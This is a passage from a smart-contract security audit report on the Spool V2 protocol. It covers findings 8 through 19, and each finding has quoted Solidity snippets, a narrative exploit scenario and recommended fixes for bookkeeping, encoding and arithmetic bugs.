* SECONDS_IN_YEAR_INT / int256 weight = _getRunningAverageApyWeight(timeDelta); _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT; } } } } Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298–L317 A strategy’s APY is one of the parameters used by an allocator provider to decide where to allocate the assets of a smart vault. If a strategy’s APY is 0 , the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error. // set allocation if (uint16a16.unwrap(allocations) == 0) { _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider); _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance); _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider); allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies); } Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313–L3 20 When a vault is created, the code in figure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0 , which means the value will be calculated by the smart contract, and whose allocationProvide r variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies’ APYs to be set to 0 , in turn causing the same division-by-zero error. Refer to finding TOB-SPL-7 , which is related to this issue; even if that finding is fixed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls. Exploit Scenario Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvide r set to LinearAllocationProvider . The transaction unexpectedly fails. Recommendations Short term, add calls to _updateDhwYieldAndApy where appropriate. Long term, improve the system’s unit and integration tests to ensure that the basic operations work as expected. +9. Incorrect bookkeeping of assets deposited into smart vaults Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-9 Target: managers/DepositManager.sol Description Assets deposited by users into smart vaults are incorrectly tracked. As a result, assets deposited into a smart vault’s strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies. When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault flush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current flush cycle instead of the sum of all deposits (figure 9.1). function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // transfer tokens from user to master wallet for ( uint256 i; i < bag2.tokens.length; ++i) { _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i]; } ... Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439 The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); if (_vaultDeposits[smartVault][flushIndex][0] == 0) { return uint16a16.wrap(0); } // handle deposits uint256 [] memory exchangeRates = SpoolUtils.getExchangeRates(tokens, _priceFeedManager); _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates); uint256 [][] memory distribution = distributeDeposit ( DepositQueryBag1({ deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length) , exchangeRates: exchangeRates, allocation: allocation, strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry) }) ); ... return _strategyRegistry.addDeposits(strategies, distribution) ; } Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188–L 226 Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution, which adds the amounts to deploy in the next doHardWork function call in the _assetsDeposited variable (figure 9.3). function addDeposits( address [] calldata strategies_, uint256 [][] calldata amounts) { external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns (uint16a16) uint16a16 indexes; for ( uint256 i; i < strategies_.length; ++i) { address strategy = strategies_[i]; uint256 latestIndex = _currentIndexes[strategy]; indexes = indexes.set(i, latestIndex); for ( uint256 j = 0; j < amounts[i].length; j++) { _assetsDeposited[strategy][latestIndex][j] += amounts[i][j]; } } return indexes; } Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343–L361 The next time the doHardWork function is called, it will transfer the equivalent of the last deposit’s amount instead of the sum of all deposits from the master wallet to the assigned strategy (figure 9.4). function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Transfer deposited assets to the strategy. for ( uint256 k; k < assetGroup.length; ++k) { if (_assetsDeposited[strategy][dhwIndex][k] > 0) { _masterWallet.transfer( IERC20(assetGroup[k]), strategy, _assetsDeposited[strategy][dhwIndex][k] ); } } ... Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L3 41 Exploit Scenario Bob deploys a smart vault. One hundred deposits are made before a smart vault flush is invoked, but only the last deposit’s assets are deployed to the underlying strategies, severely impacting the smart vault’s performance. Recommendations Short term, modify the depositAssets function so that it correctly tracks all deposits within a flush cycle, rather than just the last deposit. Long term, improve the system’s unit and integration tests: test a smart vault with a single strategy and multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies. +10. Risk of malformed calldata of calls to guard contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-10 Target: managers/GuardManager.sol Description The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the affected guard contract to give incorrect results or to always revert calls. Guards for vaults are customizable checks that are executed on every user action. The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (figure 10.1). function runGuards( address smartVaultId , RequestContext calldata context) external view { [...] bytes memory encoded = _encodeFunctionCall(smartVaultId, guard , context); ( bool success , bytes memory data) = guard.contractAddress.staticcall(encoded) ; _checkResult (success, data, guard.operator, guard.expectedValue, i); } } Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19–L33 The arguments of the runGuards function include information related to the given user action and custom values defined at the time of guard definition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard definition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (figure 10.2). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { [...] result = bytes .concat(result, methodID ); for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(paramsEndLoc)); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length ; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } customValueIdx = 0 ; for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32 )); result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { customValueIdx++; } [...] } return result; } Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen: 1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable. 2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected. Exploit Scenario Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard definition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable. Recommendations Short term, modify the associated code so that it verifies that custom values are properly padded before guard definitions are initialized in GuardManager.setGuards . Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. Additionally, improve the user documentation with necessary technical details to properly use the system. +11. GuardManager does not account for all possible types when encoding guard arguments Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-11 Target: managers/GuardManager.sol Description While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for fixed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior. The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (figure 11.1). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { bytes4 methodID = bytes4 ( keccak256 (abi.encodePacked(guard.methodSignature))); uint256 paramsLength = guard.methodParamTypes.length ; bytes memory result = new bytes ( 0 ); result = bytes .concat(result, methodID); uint16 customValueIdx = 0 ; uint256 paramsEndLoc = paramsLength * 32 ; // Loop through parameters and // - store values for simple types // - store param value location for dynamic types for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } else if (paramType == GuardParamType.Assets) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.assets.length * 32 ; } else if (paramType == GuardParamType.Tokens) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.tokens.length * 32 ; } else { revert InvalidGuardParamType( uint256 (paramType)); } } [...] return result; } Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 The function calculates the offset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, fixed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated offset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions or revert every call. Exploit Scenario Bob deploys a smart vault and creates a guard contract that takes the custom value of a fixed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard definition in GuardManager , but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution. Recommendations Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the offsets correctly. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. +12. Use of encoded values in guard contract comparisons could lead to opposite results Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-12 Target: managers/GuardManager.sol Description The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators. The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (figure 12.1). function _checkResult ( bool success , bytes memory returnValue, bytes2 operator, bytes32 value , uint256 guardNum ) internal pure { if (!success) revert GuardError(); bool result = true ; if (operator == bytes2( "==" )) { result = abi.decode(returnValue, ( bytes32 )) == value; } else if (operator == bytes2( "<=" )) { result = abi.decode(returnValue, ( bytes32 )) <= value; } else if (operator == bytes2( ">=" )) { result = abi.decode(returnValue, ( bytes32 )) >= value; } else if (operator == bytes2( "<" )) { result = abi.decode(returnValue, ( bytes32 )) < value; } else if (operator == bytes2( ">" )) { result = abi.decode(returnValue, ( bytes32 )) > value; } else { result = abi.decode(returnValue, ( bool )); } if (!result) revert GuardFailed(guardNum); } Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80–L105 When a smart vault creator defines a guard using the GuardManager.setGuards function, they define a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the first 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type. First, the numerical comparison operators ( < , > , <= , >= ) are not well defined for bytes32 ; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type. The Solidity documentation includes the following description about the encoding of int type values: int: enc(X) is the big-endian two’s complement encoding of X, padded on the higher-order (left) side with 0xff bytes for negative X and with zero-bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description about the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00 , the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the first 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. Bob uses the B contract as a guard with the comparison operator > and an expected value of 0 . Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[] . The first 32 bytes of the return data contain the offset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bob’s smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. +13. Lack of contract existence checks on low-level calls Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-13 Target: GuardManager.sol , Swapper.sol Description The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (figure 13.1). function swap ( address [] calldata tokensIn, SwapInfo[] calldata swapInfo, address [] calldata tokensOut, address receiver ) external returns ( uint256 [] memory tokenAmounts) { // Perform the swaps. for ( uint256 i ; i < swapInfo.length; ++i) { if (!exchangeAllowlist[swapInfo[i].swapTarget]) { revert ExchangeNotAllowed(swapInfo[i].swapTarget); } _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget); ( bool success , bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData); if (!success) revert (SpoolUtils.getRevertMsg(data)); } // Return unswapped tokens. for ( uint256 i ; i < tokensIn.length; ++i) { uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf( address ( this )); if (tokenInBalance > 0 ) { IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance); } } Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29–L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this finding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful. However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (figure 13.3). function _compound( address [] calldata tokens, SwapInfo[] calldata swapInfo, uint256 [] calldata ) internal override returns ( int256 compoundedYieldPercentage) { if (swapInfo.length > 0) { address [] memory markets = new address [](1); markets[0] = address (cToken); comptroller.claimComp( address ( this ), markets); uint256 compBalance = comp.balanceOf(address(this)); if (compBalance > 0) { comp.safeTransfer(address(swapper), compBalance); address [] memory tokensIn = new address [](1); tokensIn[0] = address(comp); uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0]; if ( swappedAmount > 0) { uint256 cTokenBalanceBefore = cToken.balanceOf( address ( this )); _depositToCompoundProtocol (IERC20(tokens[0]), swappedAmount); uint256 cTokenAmountCompounded = cToken.balanceOf( address ( this )) - cTokenBalanceBefore; _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded); compoundedYieldPercentage = } } } } Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol If the swap operation fails, the COMP will stay in CompoundV2Strategy . This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the “do hard worker” may not notice that yield is not compounding. As a result, users will receive less in profit than they otherwise would have. The GuardManager.runGuards function, which uses the address().staticcall() function, is also affected by this issue. However, the return value of the call is decoded, so the calls would not fail silently. Exploit Scenario The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy , the “do hard worker” sets the swapTarget address to an incorrect address. The swap operation to exchange COMP to the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in profit. Recommendations Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap . Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the “Warnings” section, before implementing them to ensure that they are implemented correctly. +14. Incorrect use of exchangeRates in doHardWork Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-14 Target: managers/StrategyRegistry.sol Description The StrategyRegistry contract’s doHardWork function fetches the exchangeRates for all of the tokens involved in the “do hard work” process, and then it iterates over the strategies and saves the exchangeRates values for the current strategy’s tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates. function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Get exchange rates for tokens and validate them against slippages. uint256 [] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager); for ( uint256 i; i < dhwParams.tokens.length; ++i) { if ( exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0] || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1] revert ExchangeRateOutOfSlippages(); ) { } } ... // Get exchange rates for this group of strategies. uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId(); address [] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets(); uint256 [] memory assetGroupExchangeRates = new uint256 [](assetGroup.length); for (uint256 j; j < assetGroup.length; ++j) { bool found = false ; for ( uint256 k; k < dhwParams.tokens.length; ++k) { if (assetGroup[j] == dhwParams.tokens[k]) { assetGroupExchangeRates[j] = exchangeRates[k]; found = true ; break ; } } ... // Do the hard work on the strategy. DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork( StrategyDhwParameterBag({ swapInfo: dhwParams.swapInfo[i][j], compoundSwapInfo: dhwParams.compoundSwapInfo[i][j], slippages: dhwParams.strategySlippages[i][j], assetGroup: assetGroup, exchangeRates: exchangeRates , withdrawnShares: _sharesRedeemed[strategy][dhwIndex], masterWallet: address(_masterWallet), priceFeedManager: _priceFeedManager, baseYield: dhwParams.baseYields[i][j], platformFees: platformFeesMemory }) ); // Bookkeeping. _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _exchangeRates[strategy][dhwIndex].setValues( exchangeRates ); ... Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L 341 The exchangeRates values are used by a strategy’s doHardWork function to calculate how many assets in USD value are to be deposited and how many in USD value are currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates , the contract will return incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits. Exploit Scenario Bob deploys a smart vault, and users start depositing into it. However, the first time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds. Recommendations Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable. Long term, improve the system’s unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but then never used; this is a warning sign that problems may arise. +15. LinearAllocationProvider could return an incorrect result Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-15 Target: providers/LinearAllocationProvider.sol Description The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8 due to an incorrect literal value in the riskArray variable. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { ... uint24 [21] memory riskArray = [ 100000, 95000, 900000 , ... ]; ... uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { ... results[i] = apy * riskArray[ uint8 (20 - riskt)] + risk * riskArray[ uint8 (riskt)] ; resSum += results[i]; } uint256 resSum2; for ( uint8 i; i < results.length; ++i) { results[i] = FULL_PERCENT * results[i] / resSum; resSum2 += results[i]; } results[0] += FULL_PERCENT - resSum2; return results; Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9–L67 The riskArray ’s third element is incorrect; this affects the computed allocation for smart vaults that have a riskTolerance value of -8 because the riskt variable would be 2 , which is later used as index for the riskArray . The subexpression risk * riskArray[uint8(rikst)] is incorrect by a factor of 10. Exploit Scenario Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong. Recommendations Short term, replace 900000 with 90000 in the calculateAllocation function. Long term, improve the system’s unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray . This will make it more likely that the Spool team will find these types of mistakes. +16. Incorrect formula used for adding/subtracting two yields Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-16 Target: manager/StrategyRegistry.sol , strategies/Strategy.sol Description The doHardWork function adds two yields with different base values to compute the given strategy’s total yield, which results in the collection of fewer ecosystem fees and treasury fees. It is incorrect to add two yields that have different base values. The correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1*Y2) . The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategy’s total yield. The protocol yield percentage is calculated with the base value of the strategy’s total assets at the start of the current “do hard work” cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy. dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield); dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages); Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95–L96 Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platform’s governance system. Same issue also affects the computation of the total yield of a strategy on every “do hard work” cycle: _stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({ sharesMinted: uint128 (dhwInfo.sharesMinted), totalStrategyValue: uint128 (dhwInfo.valueAtDhw), totalSSTs: uint128 (dhwInfo.totalSstsAtDhw), yield: int96 (dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before timestamp: uint32 (block.timestamp) }); Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331–L337 This value of the total yield of a strategy is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner. Exploit Scenario The Spool team deploys the system. Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next “do hard work” execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 and the total yield is 10%. However, the doHardWork function computes the total yield as 9.85%, which is incorrect, resulting in fewer fees collected for the platform. Recommendations Short term, use the correct formula to calculate a given strategy’s total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategy’s total yield at different “do hard work” indexes in DepositManager.sol#L322–L326 to compute the difference between the strategy’s yields between two “do hard work” cycles. After fixing this issue, this function’s computation will be incorrect. Long term, review the entire codebase to find all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas. +17. Smart vaults with re-registered strategies will not be usable Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-17 Target: manager/StrategyRegistry.sol Description The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategy’s previous state, resulting in a temporary DoS of the smart vaults using it. The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (figure 17.1). StrategyRegistry tracks the state of the strategies by using their address. function registerStrategy ( address strategy ) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy}); _accessControl.grantRole(ROLE_STRATEGY, strategy); _currentIndexes[strategy] = 1 ; _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _stateAtDhw[ address (strategy)][ 0 ].timestamp = uint32 ( block.timestamp ); } Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role. function _removeStrategy ( address strategy ) private { if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy}); _accessControl.revokeRole(ROLE_STRATEGY, strategy); } Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol While removing a strategy, StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy. Exploit Scenario Strategy S is registered. StrategyRegistry._currentIndex[S] is equal to 1 . Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol. A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndex[S] is set to 1 . StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable. Recommendations Short term, modify the StrategyRegistry._removeStrategy function so that it clears states related to removed strategies if re-registering strategies is an intended use case. If this is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it verifies that newly registered strategies have not been previously registered. Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected. +18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-18 Target: manager/SmartVaultManager.sol , SmartVault.sol Description The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of it is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds , will show less than the given user’s actual balance. SmartVault._afterTokenTransfer is executed after every token transfer (figure 18.1). function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { uint256 count = _activeUserNFTCount[from]; for ( uint256 i ; i < ids.length; ++i) { for ( uint256 j = 0 ; j < count; j++) { if (_activeUserNFTIds[from][j] == ids[i]) { _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1 ]; count--; break ; } } } _activeUserNFTCount[from] = count; return ; } [...] } Figure 18.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol It removes the burned NFT from _activeUserNFTIds . However, it does not consider the amount of the NFT that was burned. As a result, NFTs that are not completely burned will not be considered active by the vault. SmartVaultManager.getUserSVTBalance uses SmartVault._activeUserNFTIds to calculate a given user’s SVT balance (figure 18.2). function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 18.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because partial NFTs are not present in SmartVault._activeUserNFTIds , the calculated balance will be less than the user’s actual balance. The front end using getUserSVTBalance will show incorrect balances to users. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds . Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system. Recommendations Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely. Long term, improve the system’s unit and integration tests to extensively test view functions. +19. Transfers of D-NFTs result in double counting of SVT balance Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-19 Target: manager/SmartVaultManager.sol , SmartVault.sol Description The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance. The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users’ active NFTs: function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { ... return ; } // mint or transfer for ( uint256 i; i < ids.length; ++i) { 